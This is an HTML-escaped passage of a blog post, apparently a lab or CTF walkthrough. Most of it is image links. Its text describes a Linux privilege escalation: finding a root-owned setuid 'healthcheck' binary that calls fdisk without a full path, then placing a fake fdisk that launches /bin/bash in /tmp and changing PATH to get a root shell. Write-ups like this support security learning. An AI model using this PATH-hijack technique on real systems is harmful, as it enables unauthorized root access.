src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjAobKD9F7OUI5uzyGDU9VUIAfz4cRh7dPbJ3wpyEktQuiW-VdXbJVu7LnbKs_TGvtORR6FH2T2eDseXXx8h1Z0I6eTzjIHW0hXLL0JzJanwKGVCAaUZgo9Dlxcv3VMAltx1N8HD6mq6OA2ZLZxOQc8c9EtMpxnRWWefELBlYuWIH2y7t2SDl_X5ti6Ug=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;......................................&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEikOaikcrgpUz1NKncYVZS7CroLLP0TlgyeHGu7hHIWoLSz3If-nJ00sMCK5s-qerjjPebs8W3FWeoaaHjaEJM0Vk0g4OVcPq_YaLg_18IsV9WgX-4vlh6xBcwoV5fpmJkOUuMxUvbNcAxcHAhsm_g6dZOt1s7WPNIScSsl9hkxtsMnLyrT4a0vp4EbCQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;276&quot; data-original-width=&quot;773&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEikOaikcrgpUz1NKncYVZS7CroLLP0TlgyeHGu7hHIWoLSz3If-nJ00sMCK5s-qerjjPebs8W3FWeoaaHjaEJM0Vk0g4OVcPq_YaLg_18IsV9WgX-4vlh6xBcwoV5fpmJkOUuMxUvbNcAxcHAhsm_g6dZOt1s7WPNIScSsl9hkxtsMnLyrT4a0vp4EbCQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjg6Qq7P7_LaDLBzuucix5F3skfYZnBv9stUUAPcWQoRumI-xuEQxdd5oI3Z05Sdl6ab6Ls3wFCmT8MdRMoo-ot6YRW8EAYJCtIj8XAq3a_n06wqdV3Fxm2oEGwxgKCjG2SmaRAD0Lww6Px1O0vnk9_JWXvvWvmPx0JMjyMpHDBxEG0mPk83xGqs-mpZg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;79&quot; data-original-width=&quot;371&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjg6Qq7P7_LaDLBzuucix5F3skfYZnBv9stUUAPcWQoRumI-xuEQxdd5oI3Z05Sdl6ab6Ls3wFCmT8MdRMoo-ot6YRW8EAYJCtIj8XAq3a_n06wqdV3Fxm2oEGwxgKCjG2SmaRAD0Lww6Px1O0vnk9_JWXvvWvmPx0JMjyMpHDBxEG0mPk83xGqs-mpZg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #3d85c6; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for files with &lt;b&gt;setuid&lt;/b&gt; bit:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjX6-1gLNPKyZQfmQRk5UXUhOv7qH-EC_XzPnkoWGo_D7QJsbCkzWiiPdK8Z6eLXLDDOtiyIsbByUpfI0xxvgEuPCIfocv0SvT11GW9VPDUcdyM9ORzfqiYPcMI6TaSm8oZP2dP4-nfTMj4xFrcdkvOgvFh8WV2OvgX2-okGq1V7g24R8kNLz9PjkMZIw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;821&quot; data-original-width=&quot;520&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjX6-1gLNPKyZQfmQRk5UXUhOv7qH-EC_XzPnkoWGo_D7QJsbCkzWiiPdK8Z6eLXLDDOtiyIsbByUpfI0xxvgEuPCIfocv0SvT11GW9VPDUcdyM9ORzfqiYPcMI6TaSm8oZP2dP4-nfTMj4xFrcdkvOgvFh8WV2OvgX2-okGq1V7g24R8kNLz9PjkMZIw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- For instance file &lt;b&gt;healthcheck,&lt;/b&gt; owned by&lt;b&gt; root,&lt;/b&gt; it can be run by user &lt;b&gt;medical &lt;/b&gt;because of the &lt;b&gt;setuid&lt;/b&gt; bit:&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhOT4QSJos-wEkbIJ3Cm4LgblEwIc4c60ZrEgCNoBMGKORL1eqptmh1tuLP9tiweF2cf3NfHkcXTKFRmcs3HFGotQpYz8E5Tx9hKqi322T6ymG5DhRgyQ1PmrQAouDBCl9FbxLG-ca3rsEZ_Vm2LrgS_PLYt-dsm2LF3TWLko-PJNx-CrjCpNViHkaYLg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;141&quot; data-original-width=&quot;691&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhOT4QSJos-wEkbIJ3Cm4LgblEwIc4c60ZrEgCNoBMGKORL1eqptmh1tuLP9tiweF2cf3NfHkcXTKFRmcs3HFGotQpYz8E5Tx9hKqi322T6ymG5DhRgyQ1PmrQAouDBCl9FbxLG-ca3rsEZ_Vm2LrgS_PLYt-dsm2LF3TWLko-PJNx-CrjCpNViHkaYLg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running &lt;b&gt;healthcheck&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiyKtF85DaPns7OvKpfjNdCgVKMVKmFmW3o8kO-iKwNWx7434VXz2PZpjzz7NWN8TZQkDSEdyoBUqPL_nLHJO20FAtsbJI0S8ChVNynnpjIUpwRCn49Ufd95SSVEcgtJ769-arsN09OyCIX6pgNca0Fu8OReB33lDYAW-tGVm_773rfMkC4IhnD1RaIeg&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;612&quot; data-original-width=&quot;876&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiyKtF85DaPns7OvKpfjNdCgVKMVKmFmW3o8kO-iKwNWx7434VXz2PZpjzz7NWN8TZQkDSEdyoBUqPL_nLHJO20FAtsbJI0S8ChVNynnpjIUpwRCn49Ufd95SSVEcgtJ769-arsN09OyCIX6pgNca0Fu8OReB33lDYAW-tGVm_773rfMkC4IhnD1RaIeg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;clear: left; float: left; font-family: arial; font-size: medium; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;880&quot; data-original-width=&quot;852&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgn3zs7A8ifbcOf79plQSVDli6Fig_X_LtKXkiyLl75UX4hnt6PSsp0CiLkn4Th10cYDIbRb-ZXCDBBZ1BiqjJaKSOsvAX7HZdHWVwSq4vhyF8d5aiWwa6MZ7M8oy7XpWb80GQSegc2FaZySRdbxbGlW6rs3vTvSb_7x8ielTDs2INknEZf3wt3od59Fw=s16000&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Applying &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;strings&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; to &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;healthcheck&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; we discover that it uses some commands like &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;fdisk, ifconfig, du&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;, ... without the whole path (&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;/bin, /sbin&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;):&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjvOBlxngXZEP0rSbd_knGZ2woE5FDLuBMrDVbQMiqcVijtWmQzs7yoBYHk5w6RKLeDWXZTfTURZgZyCO4JhC412pdVU_VnutAYTzfRmnhdhEbQ2vrFO612-3CKrL3rVzytU-HnT3r5g_2zbHoCn79T54kVNP7GgZZW8NQ5ntqa4nozVoXbckjxEcNaIw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;324&quot; data-original-width=&quot;1223&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjvOBlxngXZEP0rSbd_knGZ2woE5FDLuBMrDVbQMiqcVijtWmQzs7yoBYHk5w6RKLeDWXZTfTURZgZyCO4JhC412pdVU_VnutAYTzfRmnhdhEbQ2vrFO612-3CKrL3rVzytU-HnT3r5g_2zbHoCn79T54kVNP7GgZZW8NQ5ntqa4nozVoXbckjxEcNaIw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So moving to &lt;b&gt;/tmp&lt;/b&gt;&amp;nbsp;let&#39;s write a new script&lt;b&gt; fdisk&lt;/b&gt; containing &lt;b&gt;/bin/bash&lt;/b&gt;, and then let&#39;s update enviroment variable &lt;b&gt;PATH&lt;/b&gt; pointing to &lt;b&gt;/tmp&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjEwjcQSpby8w-Vy6v7t155uvu348t5oP1eQtXmMODHX5brkZDXIVJcykKzZNcjVuZtRSh1eMLPbV7XJpi5QOnvOHvs56wFM4OGzLDCzgKYTdH1oA2Uq_MoLkBbzTw5JEzLGjgTH42A_BwUcYof5-uX4yqQN7WgMuxxdqOXNTUAeP4BN2LfSQfDI_d9sQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;257&quot; data-original-width=&quot;379&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjEwjcQSpby8w-Vy6v7t155uvu348t5oP1eQtXmMODHX5brkZDXIVJcykKzZNcjVuZtRSh1eMLPbV7XJpi5QOnvOHvs56wFM4OGzLDCzgKYTdH1oA2Uq_MoLkBbzTw5JEzLGjgTH42A_BwUcYof5-uX4yqQN7WgMuxxdqOXNTUAeP4BN2LfSQfDI_d9sQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Now, when &lt;b&gt;healtcheck&lt;/b&gt;&amp;nbsp;(owned by &lt;b&gt;root&lt;/b&gt;) calls to &lt;b&gt;fdisk&lt;/b&gt; it will execute &lt;b&gt;/bin/bash&lt;/b&gt; as a root.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running again&amp;nbsp;&lt;b&gt;healthcheck&lt;/b&gt;&amp;nbsp;we have finally a root shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjTy2C3MYI-BhFTNiixf3FkxlqcQhu5gwDV3rdyur50mFN37sbDBRRnQWfRAZwBUb3OaRdBwsUq9orSTaVX9DPvvP3ChoqfzsQebqGx3vqpc2tpWjI4VwjVqpy98HizA5E9uk3ufMAhPp9UFRA7GUiuNCkDulvw_vWFko1Nrkvge9g2-ey8PLNwb9BSaw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;347&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjTy2C3MYI-BhFTNiixf3FkxlqcQhu5gwDV3rdyur50mFN37sbDBRRnQWfRAZwBUb3OaRdBwsUq9orSTaVX9DPvvP3ChoqfzsQebqGx3vqpc2tpWjI4VwjVqpy98HizA5E9uk3ufMAhPp9UFRA7GUiuNCkDulvw_vWFko1Nrkvge9g2-ey8PLNwb9BSaw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgGGDWkbf0We6VrCqg2MvYsVq5bz6mFq3oW-P9xyYliJv7xw95qx-QjfOKvFX50HAvu5TdizAMydH0DbV71-axAKAFVMJZD61POJsUIn4yI4iXPNSF6LXbjU9H4xysPy7m_dBjsga8_cdTPoYkfsTMyvw0ScTRY1mscB839awpVtCnVQC578UmKp3O8jg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;679&quot; data-original-width=&quot;958&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgGGDWkbf0We6VrCqg2MvYsVq5bz6mFq3oW-P9xyYliJv7xw95qx-QjfOKvFX50HAvu5TdizAMydH0DbV71-axAKAFVMJZD61POJsUIn4yI4iXPNSF6LXbjU9H4xysPy7m_dBjsga8_cdTPoYkfsTMyvw0ScTRY1mscB839awpVtCnVQC578UmKp3O8jg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span 